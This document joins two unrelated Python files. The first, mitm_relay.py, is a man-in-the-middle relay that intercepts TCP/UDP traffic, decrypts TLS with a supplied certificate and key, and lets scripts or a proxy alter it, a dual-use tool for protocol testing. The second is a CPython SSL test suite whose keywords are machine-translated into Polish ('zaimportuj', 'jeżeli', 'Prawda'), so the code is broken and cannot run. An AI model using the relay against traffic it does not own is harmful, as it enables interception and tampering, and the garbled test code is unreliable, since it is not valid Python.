mitm_relay.py | #!/usr/bin/env python
import sys
import socket
import ssl
import os
import requests
import argparse
import time
import string
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from threading import Thread
from select import select
BIND_WEBSERVER = ('127.0.0.1', 49999)
BUFSIZE = 4096
__prog_name__ = 'mitm_relay'
__version__ = 0.4
def main():
parser = argparse.ArgumentParser(description='%s version %.2f' % (__prog_name__, __version__))
parser.add_argument('-l', '--listen',
action='store',
metavar='<listen>',
dest='listen',
help='Address the relays will listen on. Default: 0.0.0.0',
default='0.0.0.0')
parser.add_argument('-r', '--relay',
action='append',
nargs='+',
metavar='<relay>',
dest='relays',
help='''Create new relays.
Several relays can be created by repeating the paramter.
If the protocol is omitted, TCP will be assumed.
Format: [udp:|tcp:]lport:rhost:rport''',
required=True)
parser.add_argument('-s', '--script',
action='store',
metavar='<script>',
dest='script',
type=argparse.FileType('r'),
help='''Python script implementing the handle_request() and
handle_response() functions (see example). They will be
called before forwarding traffic to the proxy, if specified.''',
default=False)
parser.add_argument('-p', '--proxy',
action='store',
metavar='<proxy>',
dest='proxy',
help='''Proxy to forward all requests/responses to.
If omitted, traffic will only be printed to the console
(monitoring mode unless a script is specified).
Format: host:port''',
default=False)
parser.add_argument('-c', '--cert',
action='store',
metavar='<cert>',
dest='cert',
type=argparse.FileType('r'),
help='Certificate file to use for SSL/TLS interception',
default=False)
parser.add_argument('-k', '--key',
action='store',
metavar='<key>',
dest='key',
type=argparse.FileType('r'),
help='Private key file to use for SSL/TLS interception',
default=False)
parser.add_argument('-cc', '--clientcert',
action='store',
metavar='<clientcert>',
dest='clientcert',
type=argparse.FileType('r'),
help='Client certificate file to use for connecting to server',
default=False)
parser.add_argument('-ck', '--clientkey',
action='store',
metavar='<clientkey>',
dest='clientkey',
type=argparse.FileType('r'),
help='Client private key file to use for connecting to server',
default=False)
cfg = parser.parse_args()
cfg.prog_name = __prog_name__
relays = [item for sublist in cfg.relays for item in sublist]
cfg.relays = []
for r in relays:
r = r.split(':')
try:
if len(r) == 3:
cfg.relays.append(('tcp', int(r[0]), r[1], int(r[2])))
elif len(r) == 4 and r[0] in ['tcp', 'udp']:
cfg.relays.append((r[0], int(r[1]), r[2], int(r[3])))
else:
raise
if r[0] == 'udp' and cfg.listen.startswith('127.0.0'):
print color("[!] In UDP, it's not recommended to bind to 127.0.0.1. If you see errors, try to bind to your LAN IP address instead.", 1)
except:
sys.exit('[!] error: Invalid relay specification, see help.')
if not (cfg.cert and cfg.key):
print color("[!] Server cert/key not provided, SSL/TLS interception will not be available.", 1)
if not (cfg.clientcert and cfg.clientkey):
print color("[!] Client cert/key not provided.", 1)
# There is no point starting the local web server
# if we are not going to intercept the req/resp (monitor only).
if cfg.proxy:
start_ws()
else:
print color("[!] Interception disabled! %s will run in monitoring mode only." % __prog_name__, 1)
# If a script was specified, import it
if cfg.script:
try:
from imp import load_source
cfg.script_module = load_source(cfg.script.name, cfg.script.name)
except Exception as e:
print color("[!] %s" % str(e))
sys.exit()
server_threads = []
for relay in cfg.relays:
server_threads.append(Thread(target=create_server, args=(relay, cfg)))
for t in server_threads:
t.setDaemon(True)
t.start()
time.sleep(.2)
while True:
try:
time.sleep(100)
except KeyboardInterrupt:
sys.exit("\rExiting...")
class RequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
content_length = self.headers.getheaders('content-length')
length = int(content_length[0]) if content_length else 0
body = self.rfile.read(length)
self.send_response(200)
self.end_headers()
self.wfile.write(body)
return
def log_message(self, format, *args):
return
do_POST = do_GET
do_PUT = do_GET
do_DELETE = do_GET
def start_ws():
print '[+] Webserver listening on', BIND_WEBSERVER
server = HTTPServer(BIND_WEBSERVER, RequestHandler)
try:
t = Thread(target=server.serve_forever)
t.daemon = True
t.start()
except KeyboardInterrupt:
server.shutdown()
def color(txt, code = 1, modifier = 0):
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
def data_repr(data):
def hexdump(src, length=0x10):
lines = []
for c in xrange(0, len(src), length):
lines.append("%08x: %-*s |%s|\n" %
(c, length*3,
' '.join('%02x' % ord(x) for x in src[c:c+length]),
''.join(x if 0x20 < ord(x) < 0x7f else '.' for x in src[c:c+length]))
)
return ''.join(lines)
if all(c in string.printable for c in data):
return '\n'+data
else:
return '\n'+hexdump(data)
# STARTTLS interception code based on:
# https://github.com/ipopov/starttls-mitm
def do_relay_tcp(client_sock, server_sock, cfg):
server_sock.settimeout(1.0)
client_sock.settimeout(1.0)
server_peer = server_sock.getpeername()
client_peer = client_sock.getpeername()
while True:
# Peek for the beginnings of an ssl handshake
try:
packet = client_sock.recv(BUFSIZE, socket.MSG_PEEK | socket.MSG_DONTWAIT)
if packet.startswith('\x16\x03'): # SSL/TLS Handshake.
if not (cfg.cert and cfg.key):
print color("[!] SSL/TLS handshake detected, provide a server cert and key to enable interception.", 1)
else:
print color('------------------ Wrapping sockets ------------------', 2)
client_sock = ssl.wrap_socket(client_sock, server_side=True, suppress_ragged_eofs=True, certfile=cfg.cert.name, keyfile=cfg.key.name)
# Use client-side cert/key if provided.
if (cfg.clientcert and cfg.clientkey):
server_sock = ssl.wrap_socket(server_sock, suppress_ragged_eofs=True, certfile=cfg.clientcert.name, keyfile=cfg.clientkey.name)
else:
server_sock = ssl.wrap_socket(server_sock, suppress_ragged_eofs=True)
except:
pass
receiving, _, _ = select([client_sock, server_sock], [], [])
try:
if client_sock in receiving:
data_out = client_sock.recv(BUFSIZE)
if not len(data_out): # client closed connection
print "[+] Client disconnected", client_peer
client_sock.close()
server_sock.close()
break
data_out = proxify(data_out, cfg, client_peer, server_peer, to_server=True)
server_sock.send(data_out)
if server_sock in receiving:
data_in = server_sock.recv(BUFSIZE)
if not len(data_in): # server closed connection
print "[+] Server disconnected", server_peer
client_sock.close()
server_sock.close()
break
data_in = proxify(data_in, cfg, client_peer, server_peer, to_server=False)
client_sock.send(data_in)
except socket.error as e:
print color("[!] %s" % str(e))
def do_relay_udp(relay_sock, server, cfg):
client = None
while True:
receiving, _, _ = select([relay_sock], [], [])
if relay_sock in receiving:
data, addr = relay_sock.recvfrom(BUFSIZE)
if addr == server:
data = proxify(data, cfg, client, server, to_server=False)
relay_sock.sendto(data, client)
else:
client = addr
data = proxify(data, cfg, client, server, to_server=True)
relay_sock.sendto(data, server)
def proxify(message, cfg, client_peer, server_peer, to_server=True):
def get_response():
try:
return requests.post('http://%s:%d/%s/%s/%d' %
(BIND_WEBSERVER[0], BIND_WEBSERVER[1],
('CLIENT_REQUEST/to' if to_server else 'SERVER_RESPONSE/from'),
server_peer[0], server_peer[1]),
proxies={'http': cfg.proxy},
headers=headers,
data=message).content
except requests.exceptions.ProxyError:
print color("[!] error: can't connect to proxy!", 1)
return message
"""
Modify traffic here
Send to our own parser functions, to the proxy, or both.
"""
server_str = color('%s:%d' % server_peer, 4, 1)
client_str = color('%s:%d' % client_peer, 6, 1)
date_str = color(time.strftime("%a %d %b %H:%M:%S", time.gmtime()), 5, 1)
modified_str = color('(modified!)', 2, 1)
modified = False
if cfg.script:
new_message = message
if to_server and hasattr(cfg.script_module, 'handle_request'):
new_message = cfg.script_module.handle_request(message)
if not to_server and hasattr(cfg.script_module, 'handle_response'):
new_message = cfg.script_module.handle_response(message)
if new_message == None:
print color('[!] Error: make sure handle_request and handle_response both return a message.', 1)
new_message = message
if new_message != message:
modified = True
message = new_message
if cfg.proxy:
headers = {u'User-Agent': None, u'Accept': None, u'Accept-Encoding': None, u'Connection': None}
headers['X-Mitm_Relay-To'] = '%s:%d' % (server_peer if to_server else client_peer)
headers['X-Mitm_Relay-From'] = '%s:%d' % (client_peer if to_server else server_peer)
new_message = get_response()
if new_message != message:
modified = True
message = new_message
if to_server:
msg_str = color(data_repr(message), 3, 1)
print "C >> S [ %s >> %s ] [ %s ] [ %d ] %s %s\n" % (client_str, server_str, date_str, len(message), modified_str if modified else '', msg_str)
else:
msg_str = color(data_repr(message), 3, 0)
print "S >> C [ %s >> %s ] [ %s ] [ %d ] %s %s\n" % (server_str, client_str, date_str, len(message), modified_str if modified else '', msg_str)
return message
def handle_tcp_client(client_sock, target, cfg):
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.connect(target)
do_relay_tcp(client_sock, server_sock, cfg)
def create_server(relay, cfg):
proto, lport, rhost, rport = relay
if proto == 'tcp':
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serv.bind((cfg.listen, lport))
serv.listen(2)
print '[+] Relay listening on %s %d -> %s:%d' % relay
while True:
if proto == 'tcp':
client, addr = serv.accept()
dest_str = '%s:%d' % (relay[2], relay[3])
print '[+] New client:', addr, "->", color(dest_str, 4)
thread = Thread(target=handle_tcp_client, args=(client, (rhost, rport), cfg))
thread.start()
else:
serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serv.bind((cfg.listen, lport))
thread = Thread(target=do_relay_udp, args=(serv, (rhost, rport), cfg))
thread.start()
if __name__=='__main__':
main()
|
test_ssl.py | # Test the support dla SSL oraz sockets
zaimportuj sys
zaimportuj unittest
z test zaimportuj support
zaimportuj socket
zaimportuj select
zaimportuj time
zaimportuj datetime
zaimportuj gc
zaimportuj os
zaimportuj errno
zaimportuj pprint
zaimportuj tempfile
zaimportuj urllib.request
zaimportuj traceback
zaimportuj asyncore
zaimportuj weakref
zaimportuj platform
zaimportuj functools
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
def data_file(*name):
zwrรณฤ os.path.join(os.path.dirname(__file__), *name)
# The custom key oraz certificate files used w test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched z the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys oraz certs signed by the same CA (dla SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")
SVN_PYTHON_ORG_ROOT_CERT = data_file("https_svn_python_org_root.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
WRONGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
jeลผeli support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m albo higher
zwrรณฤ ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h albo higher
zwrรณฤ ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 albo higher
zwrรณฤ ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
jeลผeli time.daylight oraz time.localtime().tm_isdst > 0:
zwrรณฤ -time.altzone # seconds
zwrรณฤ -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
jeลผeli ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
jeลผeli cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
zwrรณฤ cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL oraz forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
sprรณbuj:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
wyjฤ
wszy ssl.SSLError:
jeลผeli (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) oraz
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
podnieล unittest.SkipTest("Patched Ubuntu OpenSSL przerwijs behaviour")
zwrรณฤ func(*args, **kwargs)
zwrรณฤ f
inaczej:
zwrรณฤ func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed dla this test")
klasa BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
jeลผeli ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
jeลผeli ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {Prawda, Nieprawda})
self.assertIn(ssl.HAS_ECDH, {Prawda, Nieprawda})
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_SSLv23
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_SSLv23')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
jeลผeli support.verbose:
sys.stdout.write("\n RAND_status jest %d (%s)\n"
% (v, (v oraz "sufficient randomness") albo
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
jeลผeli v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
inaczej:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num jest invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
jeลผeli hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this jest a random string", 75.0)
ssl.RAND_add(b"this jest a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this jest a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
jeลผeli nie status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
jeลผeli pid == 0:
sprรณbuj:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
wyjฤ
wszy BaseException:
os._exit(1)
inaczej:
os._exit(0)
inaczej:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function w _ssl.c,
# provided solely dla this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
jeลผeli support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail jeลผeli the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName w some certificates
# (nieably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
jeลผeli support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP oraz AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
jeลผeli support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
jeลผeli ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
inaczej:
# OpenSSL 0.9.7 doesn't support IPv6 addresses w subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_DER_to_PEM(self):
przy open(SVN_PYTHON_ORG_ROOT_CERT, 'r') jako f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
jeลผeli nie p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
jeลผeli nie p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string jako returned by {Open,Libre}SSL, the format might change
jeลผeli "LibreSSL" w s:
self.assertPrawda(s.startswith("LibreSSL {:d}.{:d}".format(major, minor)),
(s, t, hex(n)))
inaczej:
self.assertPrawda(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
przy support.check_warnings(("", ResourceWarning)):
usuล ss
self.assertEqual(wr(), Nic)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError podnieล by the underlying socket object.
s = socket.socket(socket.AF_INET)
przy ssl.wrap_socket(s) jako ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
dla timeout w (Nic, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
przy ssl.wrap_socket(s) jako ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified dla server-side operations",
ssl.wrap_socket, sock, server_side=Prawda)
self.assertRaisesRegex(ValueError,
"certfile must be specified dla server-side operations",
ssl.wrap_socket, sock, server_side=Prawda, certfile="")
przy ssl.wrap_socket(sock, server_side=Prawda, certfile=CERTFILE) jako s:
self.assertRaisesRegex(ValueError, "can't connect w server-side mode",
s.connect, (HOST, 8080))
przy self.assertRaises(OSError) jako cm:
przy socket.socket() jako sock:
ssl.wrap_socket(sock, certfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
przy self.assertRaises(OSError) jako cm:
przy socket.socket() jako sock:
ssl.wrap_socket(sock, certfile=CERTFILE, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
przy self.assertRaises(OSError) jako cm:
przy socket.socket() jako sock:
ssl.wrap_socket(sock, certfile=WRONGCERT, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # albo podnieล an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases przy wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'pรผthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard w first fragment oraz IDNA A-labels w sequent fragments
# are supported.
idna = 'www*.pythรถn.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythรถn.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythรถn.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythรถn.org'.encode("idna").decode("ascii"))
fail(cert, 'pythรถn.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there jest a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName jest considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry w subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName oraz no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, Nic, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
przy self.assertRaises(ssl.CertificateError) jako cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work dla server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
przy socket.socket() jako sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, Prawda,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should podnieล ValueError dla unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
przy ssl.wrap_socket(c, do_handshake_on_connect=Nieprawda) jako ss:
przy self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" w ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding nie available")
def test_tls_unique_channel_binding(self):
# unconnected should zwrรณฤ Nic dla known type
s = socket.socket(socket.AF_INET)
przy ssl.wrap_socket(s) jako ss:
self.assertIsNic(ss.get_channel_binding("tls-unique"))
# the same dla server-side
s = socket.socket(socket.AF_INET)
przy ssl.wrap_socket(s, server_side=Prawda, certfile=CERTFILE) jako ss:
self.assertIsNic(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
przy self.assertWarns(ResourceWarning) jako cm:
ss = Nic
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
przy support.EnvironmentVarGuard() jako env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertPrawda(ssl.enum_certificates("CA"))
self.assertPrawda(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
